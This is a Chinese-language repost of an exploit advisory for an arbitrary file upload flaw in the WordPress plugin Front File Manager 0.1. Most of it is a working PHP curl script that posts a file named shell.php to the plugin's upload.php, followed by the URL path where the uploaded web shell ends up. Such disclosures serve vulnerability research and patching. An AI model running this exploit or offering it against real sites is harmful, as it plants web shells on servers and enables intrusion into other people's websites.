Wordpress插件Front File Manager 0.1任意文件上传漏洞-自学php网

Wordpress插件Front File Manager 0.1任意文件上传漏洞

来源：自学PHP网时间：2015-04-17 14:11 作者：阅读:次

[导读] 标题: Wordpress front file manager 0.1 Arbitrary File Upload作者: Adrien Thierrywww.2cto.com http://www.webikon.sk/en下载地址: http://downloads.wordpress.org/plugin/front-file-manager.......

标题: Wordpress front file manager 0.1 Arbitrary File Upload

作者: Adrien Thierry   www.2cto.com http://www.webikon.sk/en

下载地址: http://downloads.wordpress.org/plugin/front-file-manager.zip

影响版本: 0.1



upload.php页面存在远程文件上传缺陷.

代码 :



<?php

$u="whatyouwant.php";

$c = curl_init("http:// www.2cto.com /wp-content/plugins/front-file-manager/upload.php");

curl_setopt($c, CURLOPT_POST, true);

curl_setopt($c, CURLOPT_POSTFIELDS,

array('file'=>"@$u",

'name'=>"shell.php"));

curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);

$e = curl_exec($c);

curl_close($c);

echo $e;

?>


Shell上传后位置:

    http://www.2cto.com /wp-content/plugins/uploads/2012/06/shell.php

    (http://www.2cto.com /wp-content/plugins/uploads/[YYYY]/[MM]/shell.php

自动化web安全测试动态fuzz思路与实践(一) - 网站

SN News <= 1.2管理权限验证绕过及注射 - 网站安全

子栏目

Wordpress插件Front File Manager 0.1任意文件上传漏洞

最新评论

添加评论

更多文章推荐

添加评论